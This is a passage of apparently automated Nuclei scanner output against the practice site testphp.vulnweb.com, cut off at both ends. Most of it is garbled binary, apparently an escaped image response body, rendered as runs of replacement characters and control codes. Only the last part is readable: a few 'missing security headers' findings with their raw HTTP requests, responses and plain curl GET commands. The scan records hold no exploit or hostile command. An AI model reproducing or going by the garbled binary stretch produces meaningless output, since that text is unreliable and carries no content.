\\ufffd\\ufffd~\\u000e\\ufffd\\ufffd\\ufffd\\ufffdJi\\ufffd\\ufffd\\u0014\\ufffd\\ufffdj;\\ufffd\\ufffd\\ufffdOW\\ufffd\\u001f\\ufffd\\u001f53\\ufffd\\ufffd4\\ufffd\\ufffdn$\\ufffd\\ufffd9\\u0012eo0\\ufffd`\\ufffdb\\ufffd9\\u0001\\ufffd#,\\ufffd\\ufffd\\u0004\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd\\ufffd.\\u0012g\\ufffd[{\\ufffd\\\\1\\u000c\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdazj\\ufffd\\ufffd\\ufffd\\ufffd-\\u003e\\ufffd\\ufffd\\ufffdMa\\ufffd\\ufffd\\u0011\\ufffdꚽ\\ufffd\\ufffd\\u0018f\\ufffdG\\ufffdq\\u0012\\u0026\\ufffd\\u00263\\ufffd\\ufffdQ\\ufffd0T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdE\\ufffd[^\\ufffdIs\\ufffdtp\\ufffd[1\\u000c{\\ufffd\\r\\ufffd\\ufffd~\\u0004\\ufffd\\u0000z\\ufffd5\\ufffdG\\u0012eG\\ufffd:\\ufffd@8'\\ufffd\\u001e@\\ufffd \\u0001\\ufffd\\ufffd\\u0000H\\ufffd\\\\6\\ufffd\\ufffd\\ufffd\\ufffd8\\ufffd\\ufffd \\ufffd\\u001c\\ufffdƌz\\ufffd\\ufffd;\\ufffd\\ufffd1\\ufffdy\\ufffd\\ufffd\\u0013\\\\\\ufffd=\\ufffd\\ufffd\\ufffd\\n*\\\\~ÝUJO(\\ufffdZD!\\u0002$\\ufffd\\ufffde\\ufffd\\u000eCn\\u001fF\\u001c\\u001fʯ\\ufffdt\\ufffdw\\ufffdK\\u001cc\\u0002u-\\u001b\\ufffd68\\ufffd\\u0019?\\\\sߜ\\ufffdqY\\ufffd\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffd뱉b\\n\\ufffd\\ufffd\\ufffd\\u003e~\\ufffdZ\\ufffd\\ufffd8S\\ufffdQ\\ufffd\\ufffd\\ufffds\\ufffdU;z\\ufffd\\ufffd\\ufffd\\ufffd̙(\\ufffd\\ufffd[\\ufffdX]DV\\u001b\\ufffdW}\\ufffd\\u0002\\\\\\u0000\\t\\u001c\\u001e\\ufffd\\ufffd\\ufffd\\u0008\\ufffdY\\ufffd\\ufffdh\\ufffdF\\ufffd\\ufffd\\n4\\ufffd\\ufffda\\ufffd\\ufffd8\\ufffdl\\ufffd\\u001e;\\ufffd\\u0013\\ufffd*\\ufffd5\\ufffd\\ufffd^-\\ufffd\\ufffd3\\ufffd\\u0001 pO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdk\\u0003\\u0018\\ufffdn#B\\u0019J\\ufffd\\u003c\\ufffd\\u001e\\ufffd\\ufffd]F\\ufffd\\ufffd/\\ufffd'zQ\\ufffd\\ufffdd\\ufffd0\\\\}\\ufffdy\\u001b|ou4H\\u0013\\ufffd\\ufffdY\\ufffdg#\\ufffd\\ufffd3\\\\\\ufffd\\ufffd$\\ufffd\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdA\\\"G\\ufffdZ\\ufffd\\ufffd1\\ufffdy\\ufffd\\u00267\\ufffd\\ufffd\\ufffd3\\ufffd\\u0000\\ufffd}\\ufffd\\ufffd.\\ufffd\\ufffd\\ufffdNH\\ufffd\\ufffd0\\ufffd\\r\\ufffdg\\t\\ufffdL\\u0012\\u0000\\ufffd\\ufffd\\ufffdX\\u000f\\ufffd\\u001e\\u001f\\ufffd\\ufffd\\ufffdؠ\\ufffd\\ufffd\\u001e\\ufffd\\u000c\\ufffdu\\ufffd\\ufffdp\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\u0014\\ufffd\\\\\\ufffd\\ufffd\\u0007\\u0007\\u0018=N\\ufffd\\ufffd#\\ufffd\\ufffdE\\ufffd\\ufffd/)\\ufffd\\ufffd\\ufffd7\\ufffd{\\u000c.N \\ufffdJԬ\\ufffd\\ufffdo\\ufffd,\\ufffd#1\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd*-zj\\ufffdtr\\ufffd*\\ufffdA\\\"\\ufffd\\ufffd\\ufffda\\u0013\\ufffd\\\"\\ufffd\\u000e\\u000b\\u0000\\t\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd@\\nR\\ufffd\\u0000\\ufffd)@\\nݽ\\u0019\\ufffd\\u000e\\ufffd\\ufffdtJi7\\ufffd;\\u000f\\ufffd\\u0008\\u001d\\u0004W6Q\\ufffd^bn\\u001b\\ufffd\\ufffdr\\ufffd\\u0000\\u0001݇\\u000cG\\ufffdq\\ufffd\\ufffd*U}N\\ufffd\\ufffdTT-YI\\ufffdt\\u0026\\ufffd\\ufffd\\u0013\\ufffdn\\ufffd\\ufffd\\ufffd7\\ufffdtKy\\ufffdn-\\ufffd%x\\u0004\\ufffd\\u0008Ϩ\\u000c.C\\u0002\\u0000ʳ\\u0005$pH8\\ufffd\\u0008[\\ufffd\\ufffd\\\"]\\ufffd-\\ufffd\\ufffd\\ufffd,\\ufffdr-\\\\\\u0004i\\ufffd\\ufffd#.Oel\\u0010\\u001b\\ufffd;O#\\u0019\\ufffdO\\n\\ufffd@\\ufffd\\ufffd}n9\\ufffd.\\ufffd\\u000f i\\ufffd\\u0007\\ufffd\\ufffdo\\ufffd\\u0003\\ufffd\\nϺ\\ufffd\\ufffd[\\ufffdg\\ufffd4\\ufffdm\\u003c\\ufffd:\\ufffd\\ufffdY\\ufffd\\ufffd+mf\\ufffd\\ufffd\\ufffdn\\ufffd\\u0015\\ufffdM\\ufffd\\ufffdFw\\ufffd\\ufffd\\u0007z\\ufffd_\\ufffdŰԿq\\ufffd1\\ufffd\\ufffd\\u001f,y-\\ufffd\\ufffd\\ufffd[\\ufffd\\ufffd}2\\ufffd\\u0005 x\\ufffdQ\\u003cBkq'\\u000f\\ufffd\\u0003r\\ufffd\\ufffd\\ufffdI\\u0003\\u001f\\u0004|\\u001a\\ufffd%\\ufffdb΀\\ufffd\\u0007'\\ufffd\\ufffd.\\ufffd\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdݕ\\ufffd\\ufffd\\ufffd\\ufffd\\u0015i!\\ufffd+\\ufffd1\\ufffd\\u0001\\u000e\\ufffd%\\ufffd\\u0018\\ufffd\\ufffd\\ufffd\\ufffdF+=\\ufffdb\\ufffd\\ufffd1ナ\\ufffdYMt݋\\ufffd\\ufffdș\\ufffd\\u0019Dt\\ufffd\\ufffd\\u0014\\\\\\ufffd\\u000e_fcRC}x\\ufffd\\u000fDZ\\ufffd\\u003e\\ufffd\\rݵմ\\ufffdkr\\ufffd\\u0016\\ufffd\\ufffd\\u0000ψ\\ufffd\\ufffd^0Ɂ\\ufffd\\\\\\u0013\\ufffd\\u00169\\u003c\\ufffd\\u0001W8\\ufffdY\\ufffdz\\u0015\\u003c\\ufffd;Np\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\u0003\\ufffd\\u0004\\u000eǸ\\ufffd\\ufffdДc?W\\u0001\\ufffd\\ufffd\\\"\\ufffd\\\\%\\ufffd@\\ufffd\\ufffd'\\u0001\\ufffd\\ufffdʺ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=\\ufffd\\u0000\\u001a\\ufffdP\\ufffd\\ufffd7\\ufffd\\ufffd\\u001f\\ufffd \\ufffdK;\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\u0006\\t\\\\z\\ufffd\\u0017\\ufffd\\u0005\\ufffd\\ufffd0\\ufffd\\ufffdrx\\u0018\\u0019\\ufffdn)\\ufffdM\\ufffd\\ufffd_\\ufffdG\\\"5\\ufffdI%\\ufffd\\ufffd\\t\\u0002V\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdqT\\ufffd\\ufffd/,\\u000e\\ufffd\\u0019]C\\ufffd\\u0003\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u0003R\\ufffd\\ufffd\\ufffda\\u0001\\u0016\\ufffd\\u0014h\\ufffdE\\ufffd\\ufffd1\\u0004\\ufffdp\\u000f\\u001f8\\ufffd\\ufffdQU\\\\\\ufffd\\ufffd\\u0016^E\\ufffd74w\\ufffd\\ufffd\\u0010\\ufffdp\\ufffdsG\\ufffdb\\ufffd\\u0015\\u0001fE?˺\\u0000\\u0000\\ufffd\\ufffd\\ufffdl\\u0000\\u0003\\u001e;\\u0006\\ufffd\\ufffd.\\u0003ᯄ6\\ufffd\\u00163[u\\ufffd\\ufffdMQ\\ufffd%b\\ufffd\\ufffdhT*\\ufffd0R;\\ufffd'\\ufffd\\ufffd\\\\`溺\\ufffd\\u0000$\\ufffd\\ufffd\\u003c\\ufffd(0\\ufffd\\u0018\\ufffd\\u0000|`\\ufffd\\ufffdU\\ufffdP\\ufffd\\ufffd]ķ\\ufffd!\\ufffdB\\ufffd\\u003e0T\\ufffda\\t\\ufffd\\ufffd\\u0019\\u001e\\ufffd\\u0000\\u0011\\ufffdgAG]\\ufffdQ\\ufffd\\ufffdf\\ufffd\\ufffd\\ufffd\\u0000RǏ\\ufffd\\ufffd\\\"\\ufffd\\u001c\\ufffd\\ufffd5~\\ufffd\\ufffdt\\ufffd\\ufffdM\\ufffd6\\ufffd\\ufffd$p\\ufffd\\ufffdI\\ufffd\\ufffd+\\ufffdm\\ufffd\\u000c\\u0002{\\ufffdx\\ufffd\\ufffd9\\u000bZ\\ufffd.\\ufffdmR\\ufffdO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\u003c\\u0010\\u000e\\u0008\\ufffd}\\rz;\\u000cP\\ufffd\\u001cN\\ufffddP7F㜃\\ufffd\\ufffdpG\\ufffd\\ufffd\\\\\\ufffd\\ufffd'|5\\ufffdL\\u000f\\ufffdZ4\\u0011\\ufffd\\ufffd)k\\ufffd\\ufffd\\ufffd\\ufffdI\\ufffd#.J\\ufffdz\\u0007$\\ufffd=9\\ufffd8\\u0002\\ufffd~\\ufffdu\\ufffd\\ufffdt^\\ufffd\\ufffd\\u001f_\\ufffd3Q\\u00055\\ufffd\\ufffd\\ufffd\\\\\\ufffd)[€\\ufffd)@\\nR\\ufffd\\u0000\\ufffd)@\\u001d5\\ufffd7\\ufffdK'H\\ufffd\\u001a\\ufffd\\ufffd\\ufffd}.O9\\u001eFr\\u0004\\u001d\\ufffd*\\ufffd\\u000b(\\ufffd\\r\\ufffd\\ufffdv\\u001c1\\u003co\\ufffd\\ufffdEK[\\ufffd\\ufffd\\ufffd\\ufffd1R$i\\u000b\\u0015\\ufffdc@\\ufffd\\ufffd\\ufffd\\ufffd\\r\\ufffd\\ufffd\\ufffd\\u001c\\ufffd\\n\\ufffd\\ufffd@\\ufffdnt]R\\u001b\\ufffd6ı\\ufffd\\ufffḑ\\ufffdS\\ufffd\\ufffdEu\\ufffd\\ufffd\\ufffd\\ufffd%\\ufffd\\ufffdq̗\\ufffd\\ufffdл\\u001c\\u0003\\ufffd$\\ufffd\\u0019\\ufffd\\ufffd)\\ufffd\\ufffd\\u000c\\ufffd\\rb\\ufffd\\ufffd\\ufffd**WU\\ufffd\\ufffd\\ufffdOgz\\ufffdf\\ufffdԄ\\ufffd\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd-\\u003c *\\ufffd\\ufffd\\u0000d1\\ufffd\\ufffd\\u0014c\\u003c\\u001f\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffdIm$\\ufffd\\ufffd:\\u000f0\\u0014V_Ab\\u0007\\ufffd\\ufffd\\u0004\\u0015*W$\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd;M\\u0006\\ufffdSYLRYrʌ]\\ufffd\\ufffd\\u0014\\u000e\\u0007\\ufffd\\ufffd\\u00198\\ufffd\\t\\ufffdlU\\ufffdÿ\\u0013\\ufffd\\ufffd\\ufffdd\\ufffd\\u0013ej\\ufffd\\ufffd\\ufffde\\ufffd\\ufffd\\ufffd\\u001f\\ufffd\\ufffd\\u0000\\u0018e*\\ufffd6{z\\u0018}\\ufffd\\u000e\\u001d\\u001d3U\\n%j_-\\ufffd\\ufffd\\u0000G\\ufffd4\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdbIc\\ufffdf\\u0001ܣ%\\u001aA\\ufffd'\\ufffdRN\\u0014\\n\\ufffdb\\u003eߤ\\ufffd\\ufffd\\ufffd\\u003eZ2\\ufffdg\\u0008\\ufffd\\ufffdr\\ufffd\\ufffdr\\n\\ufffd#\\ufffd\\ufffd\\ufffd-N\\ufffd\\ufffd\\ufffd\\t\\ufffdl\\ufffd2\\ufffdBF\\u000f\\ufffd\\u0011\\ufffdE}i\\ufffd\\ufffd'\\ufffd\\ufffdܬ2yh\\ufffd\\ufffdlM\\ufffd\\ufffd\\ufffd\\ufffd@?\\ufffd\\u000f\\u001d\\ufffd\\ufffd)O\\ufffd\\u0012\\ufffd\\\"4\\ufffd\\ufffd\\u0017\\u000b4A\\ufffdӆ(\\ufffdN@e$0\\u0007\\u0003 \\u0010Goj4\\ufffd\\u0000b\\ufffd\\ufffdW\\u0002\\t1\\ufffdg\\u003cq\\ufffd\\ufffd?\\u000b\\ufffd1\\ufffd\\ufffd\\ufffdN\\u0013\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffd8\\u000e\\ufffd\\ufffd1\\u001a\\ufffd\\u0007\\ufffdrs\\ufffd\\ufffd\\u0000J\\ufffd4{\\ufffd{eNy\\ufffd\\ufffd\\u0000l\\ufffd\\ufffd\\ufffdN\\ufffd'\\r\\ufffd\\ufffdڟ%\\ufffd\\ufffd9?\\ufffd\\\\H\\ufffd\\ufffd樑d\\u000e\\ufffdy\\ufffdvc\\u0018\\ufffdl\\u001eC\\u000c\\ufffd\\ufffdc?\\ufffd\\ufffdu\\u0017\\ufffd:\\ufffd\\u0018\\u0015 \\ufffd\\ufffd\\ufffd9\\u0007\\ufffd\\ufffd\\ufffd\\ufffdE\\ufffd\\ufffdh\\ufffdf\\ufffd\\ufffdN\\ufffd? g\\ufffd##\\u003e٩v\\ufffd)q\\n\\ufffd\\u0013\\u0006\\u000c\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd9+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffdأ%\\ufffd\\ufffd}\\ufffd\\u0018\\u0000x݁uw\\u003cr2\\ufffdy\\ufffd\\u0019\\ufffd܏bI0z\\ufffdN\\ufffdR\\ufffd\\ufffd\\ufffdh\\ufffd{gc\\ufffdG*\\ufffd\\ufffd\\ufffdF\\u0018!\\ufffd\\u000er;\\u000c\\ufffd\\ufffdo\\ufffd!\\ufffdX\\ufffd\\ufffd\\ufffdv\\ufffd\\u0000\\ufffd\\u0003\\u0003;\\ufffd d\\ufffd\\u0000H'\\u0007\\ufffd\\ufffdy\\u0014Yb\\ufffd\\ufffd\\ufffd\\ufffd/\\u001f\\ufffd\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\ufffd\\ufffdBj:O^\\ufffd\\ufffd\\ufffd\\ufffdks~\\ufffd\\ufffde\\ufffd\\ufffd\\u000b\\ufffd\\ufffd\\u000c7#\\ufffd\\u0001\\ufffdOr\\u0006\\u0001\\u000c=\\ufffd\\ufffdֽ\\u0019\\ufffd\\ufffdeݬ\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdȌ\\u001d\\u001cP\\u000c?\\ufffdO\\u0004w\\u0007\\ufffdA=ܶV\\ufffdk\\ufffd$\\ufffd \\ufffd\\ufffd\\ufffdCi+\\u0016$$\\ufffd\\u0017\\ufffd9\\u003e\\ufffd\\u0019\\u001c\\u000c2ջ\\ufffd.\\ufffd\\ufffd\\ufffdΓ\\ufffdѵ+cotS̷\\ufffd\\u001b\\\\E0\\ufffd\\n\\ufffd3\\ufffd0r\\u0001*\\ufffd\\ufffd\\ufffd6\\ufffdj\\ufffd\\ufffd\\\\m\\ufffd\\ufffd\\u001e\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^zd\\ufffd\\ufffd\\ufffd\\ufffdVs\\ufffdx[\\ufffd\\ufffde\\ufffd\\ufffduu\\ufffdI\\ufffdm8o\\ufffdt\\ufffd\\u0018\\ufffd\\ufffd\\ufffd\\t\\ufffd̀\\u001eX\\u000c.\\u0018\\u001c\\u0015l`ղ\\ufffd\\ufffd\\ufffdY\\ufffdI\\ufffd\\n\\ufffd.\\u003c\\ufffdR\\ufffd \\ufffd\\ufffd\\ufffd\\u0000+$鞮\\ufffdzz\\ufffdh\\ufffdXs\\ufffdE\\ufffd\\ufffdS\\u00122G\\u003e\\ufffdc\\ufffd\\ufffdt\\ufffd\\ufffd\\u0011\\ufffdĖP\\ufffd\\ufffd\\ufffd\\u0026˩\\ufffdM\\u0014\\ufffd\\ufffdw\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd,\\t\\ufffd\\u003e\\ufffd\\u0000P)\\ufffdj7:N\\ufffd\\r唅'\\ufffd\\ufffd\\u0003\\ufffd~\\ufffd\\ufffdj\\u0015)ZMa\\ufffd\\ufffd:\\ufffd\\ufffdz\\ufffd\\u0014\\ufffdi.\\r\\ufffd0\\ufffd\\ufffdb\\ufffd6\\ufffd.~\\ufffd\\u0012I\\ufffd\\ufffdϾs\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffdV\\r\\ufffd\\ufffd\\ufffd˒\\ufffd\\u0016%s\\ufffd\\u003c\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd\\ufffd\\ufffd\\\\\\ufffdG\\ufffd7NH\\ufffd\\ufffdw\\ufffd\\ufffd\\ufffd\\u003cՌ\\u003eF@,\\ufffdw\\u0003\\ufffds\\ufffd9\\\"\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=jd\\u0026W\\ufffd\\ufffdԏ1\\ufffdm\\ufffd\\ufffdڟ@\\ufffd\\ufffdܱ\\ufffd\\ufffd\\u0005\\ufffd4\\ufffd\\ufffdl\\ufffdQ\\ufffdK)\\ufffd|c\\ufffd:TNV\\ufffd\\u0026f)\\u0000:\\ufffd\\ufffd\\u000c9\\ufffd\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000f|\\ufffd\\ufffdH\\ufffd\\ufffdKx\\ufffd9\\ufffdYa\\ufffd\\u000c\\ufffdT\\ufffd\\ufffd.J\\ufffd\\ufffd]\\ufffd%\\ufffdw\\ufffd|\\ufffd\\u00260\\ufffdw\\u0003\\ufffd\\u000foҲ\\ufffd\\u000eܢ\\ufffdc\\ufffda\\ufffd\\\\SP\\ufffd\\ufffd\\u0011$2\\ufffd\\ufffd7\\u001b\\ufffd\\ufffd|~+\\u001b\\ufffd\\ufffd[[\\ufffd\\ufffd\\ufffd\\ufffd0$\\ufffdô\\u0010s\\ufffd~y\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-/\\ufffd\\ufffd_4D\\ufffdޑ\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd@\\u001f#\\ufffd\\ufffdS5m@\\\\\\ufffd\\u001e\\ufffd0ϸ\\ufffd2\\ufffd\\ufffd($\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffdN\\u001a\\u0019S-\\ufffdc\\ufffd\\ufffd62\\ufffd5\\ufffdV\\ufffdt\\ufffd\\ufffd\\ufffdVR\\ufffd\\u0019\\ufffd~\\ufffdF\\u0008 \\ufffd`\\ufffdԻ=v\\ufffd\\ufffd\\ufffdV2\\u003c\\ufffd\\u0002\\ufffdbA\\ufffd\\ufffd\\u00001' \\ufffd\\u00003ܑ\\ufffdyƓ\\ufffd\\ufffdR\\ufffdU\\ufffd\\u001d\\ufffd\\ufffd\\u0018\\ufffdE\\ufffd\\ufffd9ܟ\\ufffd\\u0003۱\\ufffd\\ufffd\\ufffd\\ufffdT=T\\ufffdƭ\\ufffd\\ufffdRyU7\\ufffd*\\ufffd\\ufffd\\tu\\u0005\\ufffdG\\u0003qQ\\ufffd\\ufffd\\ufffdƬˢO\\ufffde\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\ufffdQ\\ufffd:\\ufffd\\ufffd5\\ufffds\\ufffdF\\ufffdl\\ufffd\\u0008#\\ufffd\\u000fЃ\\ufffd\\ufffd\\ufffd\\ufffdZMom\\ufffd\\ufffds2\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffd`\\u001229\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd#\\ufffd\\ufffd{v\\ufffd\\u001c\\ufffd\\ufffdV\\ufffd\\u0018u#\\ufffd\\ufffd@\\ufffd\\ufffd\\\\\\ufffd\\ufffd_X\\ufffd\\ufffdRА;\\\\+\\ufffdY\\ufffd}\\u0003\\ufffd\\ufffd\\u001c\\ufffd\\ufffd+\\ufffd\\ufffd*N\\ufffd\\ufffd\\ufffd)\\ufffd\\ufffd\\ufffd?an\\ufffdW\\u0013lx\\ufffd\\ufffd/\\ufffd\\ufffd\\u0017\\ufffd\\ufffd\\ufffdt\\ufffdwD4N\\ufffd\\ufffdI\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\u001d\\ufffd@? v\\ufffd\\ufffd\\ufffdr9\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdו\\ufffd\\ufffd\\ufffd7%\\ufffd9\\ufffd\\ufffd5N\\ufffd=?\\ufffdס\\ufffd\\ufffd~Ne\\ufffd\\ufffd\\u001eX\\ufffd)Wȅ)J\\u0000R\\ufffd\\ufffd\\u0005)J\\u0000\\ufffd\\ufffd^ɧjVװ\\ufffd2[Ȳ\\ufffde\\u000c\\t\\u00078 \\ufffd\\u0008\\ufffd\\u0011\\ufffd\\ufffd۾\\ufffd\\ufffdP\\ufffdM\\ufffdFb\\ufffdH\\ufffd\\ufffd\\u000b\\ufffd\\\\+/\\u0003\\ufffd\\u000e\\t\\ufffd\\u0013\\ufffd\\ufffd\\ufffdj\\ufffdtް\\ufffd,\\ufffd\\ufffdk\\u0015t{kv-\\u0018 \\ufffd\\\\\\ufffd\\u0006\\ufffd\\u0012H\\ufffd\\u0026\\ufffd\\ufffd\\ufffd\\u0004un2\\ufffd\\ufffd\\ufffdznu\\ufffd\\ufffd}#]\\u000f:\\ufffd\\ufffd=9a\\ufffd~ď\\ufffd\\u001a\\ufffd\\ufffdj\\ufffdV\\ufffd\\ufffd\\ufffdʪ\\u00103\\ufffd\\ufffd\\u0006I\\u001e\\ufffd\\ufffd{r\\u0007\\u0015\\ufffd4\\u001dXKio{lΚh\\ufffd\\ufffd)%\\u001e\\ufffd\\u0018\\ufffd\\ufffd\\u001d\\ufffd\\u001c\\u0015\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\u001da\\u0016\\ufffdu\\u0004s\\ufffdC\\u0018\\u000b$C'w\\ufffd\\u0004\\ufffd\\ufffdn\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0014]\\ufffd\\ufffdG,\\ufffdu7_ZOc\\u0006\\ufffd\\u0010H\\ufffdl\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd s\\ufffd\\ufffd\\u001fp\\u0006@'\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdK4\\u0010\\ufffd{\\u0015IJ@]\\ufffd\\u0016\\u0000m\\ny\\ufffd8\\u0018\\ufffd\\ufffd\\ufffd\\u001a\\ufffdɼ\\ufffd.n\\ufffd\\ufffd3J\\ufffd\\u0015\\ufffd\\ufffdI\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffd#\\ufffdԸ\\ufffdり\\ufffdY\\ufffdz\\ufffd\\u000b\\ufffd\\ufffd\\ufffd}F\\ufffd\\u0012\\u001a7\\ufffd\\ufffdubC\\ufffd\\ufffd\\ufffd\\ufffdx8\\ufffd\\ufffd8\\ufffdZ.\\ufffd\\ufffd\\ufffdv\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\u001fO\\ufffdI\\u000c\\ufffd\\ufffdF\\ufffd\\ufffd \\ufffd#\\ufffd\\u0013\\ufffdV\\ufffdU\\ufffd\\u0008\\ufffd\\ufffdcn\\u0008\\ufffd\\ufffd\\ufffdrX\\ufffd\\ufffde\\ufffd\\ufffd|\\ufffd=\\ufffd\\ufffdA\\ufffd(PB\\ufffd\\ufffdm\\\\\\u001eG\\n\\ufffd\\ufffd\\ufffd'\\u0000V\\ufffd\\ufffd\\rA\\ufffdMf\\ufffd\\ufffd\\ufffdw\\ufffd!*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffdQU\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\u0007J\\ufffdK\\ufffdJR\\ufffd\\u0018)JP\\u0002\\ufffd\\ufffd\\u0000)JP\\u0002\\ufffd\\ufffd\\u0000)JP\\u0006ᖳq\\ufffd\\ufffd]?%\\ufffd\\ry\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd \\ufffd\\u0008\\ufffd;f\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd\\ufffdۉ\\ufffd\\n\\ufffdY\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffdX\\ufffdQ\\ufffdN\\u0000\\ufffd$\\ufffd\\ufffdiJ\\ufffd\\u0018\\ufffds\\ufffd\\ufffdHߤ\\ufffdҔ\\ufffd$b\\ufffd\\ufffd\\u0000)JP\\u0002\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:33.656357019Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0' 'http://testphp.vulnweb.com/pictures/6.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/wvstests\",\"path\":\"/wvstests\",\"matched-at\":\"http://testphp.vulnweb.com/wvstests/\",\"request\":\"GET /wvstests HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:27 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /wvstests/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /wvstests/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"pmwiki_2_1_19/\\\"\\u003epmwiki_2_1_19/\\u003c/a\\u003e 08-Apr-2013 08:44 -\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:33.656494036Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36' 'http://testphp.vulnweb.com/wvstests'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security 